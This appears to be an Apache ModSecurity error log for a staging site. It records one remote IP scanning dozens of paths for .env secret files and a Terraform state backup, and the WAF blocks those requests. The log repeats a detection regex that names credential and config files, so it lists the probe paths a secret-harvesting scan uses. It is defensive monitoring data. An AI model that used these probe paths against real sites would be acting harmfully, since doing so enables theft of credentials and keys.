[Tue May 26 15:30:54.773982 2026] [security2:error] [pid 715645:tid 715680] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/services/.env"] [unique_id "ahVvVnVGgMGh8k213RgP9AAAFSI"]
[Tue May 26 15:30:54.810281 2026] [security2:error] [pid 715645:tid 715735] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/shop/.env"] [unique_id "ahVvVnVGgMGh8k213RgQAQAAV1k"]
[Tue May 26 15:30:54.811200 2026] [security2:error] [pid 715645:tid 715723] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/shared/.env"] [unique_id "ahVvVnVGgMGh8k213RgQAAAAV00"]
[Tue May 26 15:30:54.826892 2026] [security2:error] [pid 715645:tid 715714] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/src/.env"] [unique_id "ahVvVnVGgMGh8k213RgQDwAAV0Q"]
[Tue May 26 15:30:54.842121 2026] [security2:error] [pid 715645:tid 715862] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVnVGgMGh8k213RgP-gAAVzY"]
[Tue May 26 15:30:54.842143 2026] [security2:error] [pid 715645:tid 715792] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVnVGgMGh8k213RgP-AAAABE"]
[Tue May 26 15:30:54.854287 2026] [security2:error] [pid 715645:tid 715822] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVnVGgMGh8k213RgP-wAAAC8"]
[Tue May 26 15:30:54.866381 2026] [security2:error] [pid 715645:tid 715878] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVnVGgMGh8k213RgQCwAAAGc"]
[Tue May 26 15:30:54.869535 2026] [security2:error] [pid 715645:tid 715865] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVnVGgMGh8k213RgQDgAAAFo"]
[Tue May 26 15:30:54.872395 2026] [security2:error] [pid 715645:tid 715883] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVnVGgMGh8k213RgQEQAAAGw"]
[Tue May 26 15:30:54.875732 2026] [security2:error] [pid 715645:tid 715862] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVnVGgMGh8k213RgQEwAAV0s"]
[Tue May 26 15:30:54.880779 2026] [security2:error] [pid 715645:tid 715806] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVnVGgMGh8k213RgQDAAAAB8"]
[Tue May 26 15:30:54.883539 2026] [security2:error] [pid 715645:tid 715877] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVnVGgMGh8k213RgQEgAAAGY"]
[Tue May 26 15:30:54.890409 2026] [security2:error] [pid 715645:tid 715853] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVnVGgMGh8k213RgQDQAAAE4"]
[Tue May 26 15:30:54.898635 2026] [security2:error] [pid 715645:tid 715856] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVnVGgMGh8k213RgQFAAAAFE"]
[Tue May 26 15:30:55.005434 2026] [security2:error] [pid 715645:tid 715898] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVnVGgMGh8k213RgQFwAAe1o"]
[Tue May 26 15:30:55.006782 2026] [security2:error] [pid 715645:tid 715898] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVnVGgMGh8k213RgQFgAAe2I"]
[Tue May 26 15:30:55.011531 2026] [security2:error] [pid 715645:tid 715837] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVnVGgMGh8k213RgQGQAAAD4"]
[Tue May 26 15:30:55.020536 2026] [security2:error] [pid 715645:tid 715898] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVnVGgMGh8k213RgQGgAAezc"]
[Tue May 26 15:30:55.023921 2026] [security2:error] [pid 715645:tid 715898] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVnVGgMGh8k213RgQGwAAeyc"]
[Tue May 26 15:30:55.025159 2026] [security2:error] [pid 715645:tid 715768] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/srv/.env"] [unique_id "ahVvV3VGgMGh8k213RgQJAAAe3o"]
[Tue May 26 15:30:55.030322 2026] [security2:error] [pid 715645:tid 715765] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/stage/.env"] [unique_id "ahVvV3VGgMGh8k213RgQJQAAe3c"]
[Tue May 26 15:30:55.031248 2026] [security2:error] [pid 715645:tid 715707] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/staging/.env"] [unique_id "ahVvV3VGgMGh8k213RgQJgAAez0"]
[Tue May 26 15:30:55.042774 2026] [security2:error] [pid 715645:tid 715898] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVnVGgMGh8k213RgQHAAAe1M"]
[Tue May 26 15:30:55.053515 2026] [security2:error] [pid 715645:tid 715898] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvVnVGgMGh8k213RgQHQAAe14"]
[Tue May 26 15:30:55.060585 2026] [security2:error] [pid 715645:tid 715888] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQIAAAAHE"]
[Tue May 26 15:30:55.065337 2026] [security2:error] [pid 715645:tid 715898] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQIQAAez4"]
[Tue May 26 15:30:55.067231 2026] [security2:error] [pid 715645:tid 715898] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQIwAAe0I"]
[Tue May 26 15:30:55.071583 2026] [security2:error] [pid 715645:tid 715898] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQIgAAe28"]
[Tue May 26 15:30:55.081255 2026] [security2:error] [pid 715645:tid 715898] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQJwAAe3Y"]
[Tue May 26 15:30:55.099523 2026] [security2:error] [pid 715645:tid 715898] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQLAAAe38"]
[Tue May 26 15:30:55.160107 2026] [security2:error] [pid 715645:tid 715696] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/stg/.env"] [unique_id "ahVvV3VGgMGh8k213RgQLwAAGjI"]
[Tue May 26 15:30:55.200388 2026] [security2:error] [pid 715645:tid 715752] [remote 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQLgAAGmo"]
[Tue May 26 15:30:55.201296 2026] [security2:error] [pid 715645:tid 715672] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/stripe/.env"] [unique_id "ahVvV3VGgMGh8k213RgQOgAAGho"]
[Tue May 26 15:30:55.203538 2026] [security2:error] [pid 715645:tid 715801] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQLQAAGmk"]
[Tue May 26 15:30:55.209413 2026] [security2:error] [pid 715645:tid 715801] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQMAAAGhY"]
[Tue May 26 15:30:55.223445 2026] [security2:error] [pid 715645:tid 715801] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQMgAAGnM"]
[Tue May 26 15:30:55.230291 2026] [security2:error] [pid 715645:tid 715801] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQMQAAGnI"]
[Tue May 26 15:30:55.237147 2026] [security2:error] [pid 715645:tid 715801] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQNAAAGj8"]
[Tue May 26 15:30:55.241195 2026] [security2:error] [pid 715645:tid 715854] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQOQAAAE8"]
[Tue May 26 15:30:55.242258 2026] [security2:error] [pid 715645:tid 715815] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQNgAAACg"]
[Tue May 26 15:30:55.258017 2026] [security2:error] [pid 715645:tid 715801] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQOwAAGgY"]
[Tue May 26 15:30:55.273380 2026] [security2:error] [pid 715645:tid 715874] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQQwAAAGM"]
[Tue May 26 15:30:55.274497 2026] [security2:error] [pid 715645:tid 715833] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQQgAAADo"]
[Tue May 26 15:30:55.275058 2026] [security2:error] [pid 715645:tid 715830] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQRQAAADc"]
[Tue May 26 15:30:55.279535 2026] [security2:error] [pid 715645:tid 715848] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQRwAAAEk"]
[Tue May 26 15:30:55.299788 2026] [security2:error] [pid 715645:tid 715880] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQTQAAAGk"]
[Tue May 26 15:30:55.309997 2026] [security2:error] [pid 715645:tid 715671] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/terraform.tfstate.backup"] [unique_id "ahVvV3VGgMGh8k213RgQTgAAGhk"]
[Tue May 26 15:30:55.355545 2026] [security2:error] [pid 715645:tid 715758] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.staging.unsobered.com"] [uri "/test.php"] [unique_id "ahVvV3VGgMGh8k213RgQVAAASnA"]
[Tue May 26 15:30:55.371879 2026] [security2:error] [pid 715645:tid 715655] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/test/.env"] [unique_id "ahVvV3VGgMGh8k213RgQVwAASgk"]
[Tue May 26 15:30:55.389765 2026] [security2:error] [pid 715645:tid 715749] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/user/.env"] [unique_id "ahVvV3VGgMGh8k213RgQXgAASmc"]
[Tue May 26 15:30:55.402087 2026] [security2:error] [pid 715645:tid 715849] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQUAAAShw"]
[Tue May 26 15:30:55.402151 2026] [security2:error] [pid 715645:tid 715799] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQVgAAABg"]
[Tue May 26 15:30:55.406058 2026] [security2:error] [pid 715645:tid 715778] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQVQAAAAM"]
[Tue May 26 15:30:55.422459 2026] [security2:error] [pid 715645:tid 715743] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/v1/.env"] [unique_id "ahVvV3VGgMGh8k213RgQaAAASmE"]
[Tue May 26 15:30:55.424230 2026] [security2:error] [pid 715645:tid 715772] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/v2/.env"] [unique_id "ahVvV3VGgMGh8k213RgQagAASn4"]
[Tue May 26 15:30:55.427633 2026] [security2:error] [pid 715645:tid 715756] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/v3/.env"] [unique_id "ahVvV3VGgMGh8k213RgQawAASm4"]
[Tue May 26 15:30:55.436463 2026] [security2:error] [pid 715645:tid 715885] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQYAAAAG4"]
[Tue May 26 15:30:55.440227 2026] [security2:error] [pid 715645:tid 715887] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvV3VGgMGh8k213RgQXAAAAHA"]
